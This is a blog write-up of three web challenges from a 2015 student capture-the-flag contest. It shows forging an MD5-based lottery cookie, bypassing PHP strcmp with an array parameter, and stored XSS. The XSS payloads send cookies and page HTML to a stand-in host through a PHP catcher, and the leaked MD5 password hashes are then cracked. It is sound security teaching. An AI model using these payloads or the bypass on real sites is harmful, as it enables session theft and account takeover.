ENEI CTF 2015 - Writeups

Web

Posted by André on September 21, 2015

1 - Endless Lottery

We found this web site http://enei-x.dei.uc.pt/webhack3/ that is claiming to offer a prize when someone rolls the right number, but it's all a scam. Can you break the system to win the prize?!

The page looks like this:

Welcome to our lottery.

By visiting our page from time to time you get a chance of winning 10.0000 jelly beans!


Winning ticket: 1337500001 your ticket: 1337810218

Better luck next time... :(

The cookie changes when the page is refreshed in a new browser session. In this session, my cookie was lotinfo="706:MjlmMjI5OWNhNGIyNmZiZjQyYzIzZWU0N2M0MDExMjU=". The second part of lotinfo looks like a base64-encoded string.

$ base64 -d
MjlmMjI5OWNhNGIyNmZiZjQyYzIzZWU0N2M0MDExMjU=
29f2299ca4b26fbf42c23ee47c401125

Now we have some kind of hash, 32 hex digits long, which suggests a message digest. Let's try hashing the ticket with MD5.

$ md5
1337810218
29F2299CA4B26FBF42C23EE47C401125

Nice! Now we know that cookie = random_ID:base64(md5(ticket)). Since our goal is to win the lottery, all we need to do is rebuild the session cookie with the winning ticket.

$ md5
1337500001
D50796F06CB23BE1A80284F80EAC0C2D
$ base64
d50796f06cb23be1a80284f80eac0c2d
ZDUwNzk2ZjA2Y2IyM2JlMWE4MDI4NGY4MGVhYzBjMmQ=

lotinfo="706:ZDUwNzk2ZjA2Y2IyM2JlMWE4MDI4NGY4MGVhYzBjMmQ="

Ok you win! Flag: 2d0ad06ff8349797176aad77e10edde031ec8c82
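The cookie construction above, with the fix a defender would want, as an added example (my code, not part of the original writeup or of the challenge): it rebuilds lotinfo from the ticket exactly as reverse-engineered, shows why a check built only from public values is forgeable, and contrasts it with a cookie bound to the session by an HMAC under an assumed server-side key.

```python
import base64
import hashlib
import hmac
import secrets

# Values taken from the writeup above.
SESSION_ID = "706"
LOSING_TICKET = "1337810218"
WINNING_TICKET = "1337500001"

def lottery_cookie(session_id, ticket):
    """Rebuild lotinfo as reverse-engineered: session_id ":" base64(hex(md5(ticket))).
    The base64 input is the 32-character hex digest, not the 16 raw MD5 bytes."""
    digest = hashlib.md5(ticket.encode()).hexdigest()
    return session_id + ":" + base64.b64encode(digest.encode()).decode()

def vulnerable_check(cookie, winning_ticket=WINNING_TICKET):
    """What the server evidently does: compare the client-supplied hash with
    md5(winning ticket). Every input is public, so anyone can mint a winner."""
    encoded = cookie.split(":", 1)[1]
    presented = base64.b64decode(encoded).decode()
    return presented == hashlib.md5(winning_ticket.encode()).hexdigest()

# Hardened variant (an assumption for illustration, not the challenge's code):
# the ticket is issued by the server and bound to the session with an HMAC
# under a key that never leaves the server.
SERVER_KEY = secrets.token_bytes(32)

def issue_signed_cookie(session_id, ticket, key=SERVER_KEY):
    tag = hmac.new(key, f"{session_id}:{ticket}".encode(), hashlib.sha256).hexdigest()
    return f"{session_id}:{ticket}:{tag}"

def hardened_check(cookie, winning_ticket=WINNING_TICKET, key=SERVER_KEY):
    try:
        session_id, ticket, tag = cookie.split(":")
    except ValueError:
        return False
    expected = hmac.new(key, f"{session_id}:{ticket}".encode(), hashlib.sha256).hexdigest()
    # Constant-time tag comparison first; only a server-issued ticket is ever judged.
    return hmac.compare_digest(tag, expected) and ticket == winning_ticket

if __name__ == "__main__":
    forged = lottery_cookie(SESSION_ID, WINNING_TICKET)
    print("rebuilt cookie:", forged, "wins:", vulnerable_check(forged))
    attempt = f"{SESSION_ID}:{WINNING_TICKET}:" + "0" * 64
    print("same trick against the HMAC cookie wins:", hardened_check(attempt))
```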

2 - Plain Auth

A friend has a service online and he says that he will never get hacked with his new bulletproof authentication mechanism. Can you prove him wrong?
http://enei-x.dei.uc.pt/webhack2/index.php

This was the login page (it's not working since I'm not running PHP):

When we submit the form, a new message shows up:

Let's try to search for strcmp vulnerabilities. The strcmp(string $str1, string $str2) function returns 0 if $str1 and $str2 are equal. When we inject an array into the GET password parameter we can bypass this comparison: index.php?password[]. Given an array instead of a string, strcmp() emits a warning and returns NULL, and NULL == 0 is true under PHP's loose comparison, so the check passes.

\o/ Flag: 421c88ff643a053d2abf6b56936093a8cc5d5630

3 - Webhack 3

By analyzing some hack attempts in our HTTP logs we found a few scripts and those led us to an admin interface from our friend hacker. Can you get us inside?
http://enei-x.dei.uc.pt/webhack3/

This was the login page (it's not working since I'm not running the backend):

When we try to login using a random username and password the following message appears:

"An admin will track you by your IP"
Interesting... Let's try to steal some cookies! We need to set up a page to catch the cookie. I'm going to use PHP:

<?php
// Append whatever arrives in the "data" query parameter to log.txt, one entry per line.
$data = $_GET['data'];
$f = fopen("log.txt", "a");
fwrite($f, $data."\n");
fclose($f);
?>

Let's inject a script in the username: <script>document.location("http://my-php-host/catch.php?data=" + document.cookie);</script>

Suddenly, this hint pops up:

Let's try to get the document HTML: <script>document.location("http://my-php-host/catch.php?data=" + document.documentElement.innerHTML);</script>. It worked!

log.txt now contains:

<head></head><body><p>remember to set your cookie "token": 2272d26a38bc90570d633e7b3508c67a </p><table class="table"><thead><tr><th>IP Address</th><th>Username</th><th>Password</th></tr></thead><tbody><tr><td>192.168.2.10</td><td>Xiene1337</td><td>185de54b5a6fd960f48666edfa41e6c6</td></tr><tr><td>192.168.2.12</td><td>Xiene1337</td><td>707d14da58ce62c08bba543fa62fe638</td></tr><tr><td>192.168.2.12</td><td>Xiene1337</td><td>74dade10c776b5ab3caf8cedb06860fb</td></tr><tr><td>127.0.0.1</td><td>script>document.location("http://my-php-host/catch.php?data=" + document.documentElement.innerHTML);</script></td></tr></tbody></table></body>

Rendered, this HTML looks like this:

remember to set your cookie "token": 2272d26a38bc90570d633e7b3508c67a

IP Address      Username    Password
192.168.2.10    Xiene1337   185de54b5a6fd960f48666edfa41e6c6
192.168.2.12    Xiene1337   707d14da58ce62c08bba543fa62fe638
192.168.2.12    Xiene1337   74dade10c776b5ab3caf8cedb06860fb

If we try to login using the username Xiene1337 and setting document.cookie="token=2272d26a38bc90570d633e7b3508c67a" a new message appears:

The passwords in the log table may be MD5 hashes. Let's try to find them in MD5 databases.

MD5 Hash                            Original password
185de54b5a6fd960f48666edfa41e6c6    ljbi
707d14da58ce62c08bba543fa62fe638    ljbp
74dade10c776b5ab3caf8cedb06860fb    ljbl

These passwords were mistyped by Xiene1337, since they are very similar. To find the correct password, just look at your keyboard: on a QWERTY layout the keys i, p and l all sit next to o, so the intended last character was o. The correct password is ljbo.

\o/ Flag: 7b88396a68feaa7aa3c388227d749097cfbf99fe